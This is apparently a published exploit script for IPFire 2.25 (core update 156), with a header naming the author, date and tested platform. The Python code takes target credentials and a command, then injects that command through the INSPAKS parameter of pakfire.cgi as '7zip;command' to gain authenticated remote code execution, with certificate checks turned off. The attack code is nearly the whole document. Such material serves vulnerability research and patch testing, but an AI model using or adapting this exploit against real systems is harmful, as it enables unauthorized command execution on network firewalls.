# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire.org/ # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso # Version: 2.25 - core update 156 # Tested on: parrot os 5.7.0-2parrot2-amd64 #!/usr/bin/python3 import requests as R import sys import base64 try: host = sys.argv[1] assert host[:4] == "http" and host[-1] != "/" url = host + "/cgi-bin/pakfire.cgi" username = sys.argv[2] password = sys.argv[3] komut = sys.argv[4] except: print(f"{sys.argv[0]} http://target.com:444 username password command") exit(1) veri = { "INSPAKS": f"7zip;{komut}", "ACTION":"install", "x": "10", "y": "6" } token = b"Basic " + base64.b64encode(f"{username}:{password}".encode()) header = {"Authorization": token, "Connection": "close", "Cache-Control": "max-age=0", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Origin": host, "Sec-GPC": "1", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": host} R.post(url, data=veri, headers=header, verify=False) print("Done.")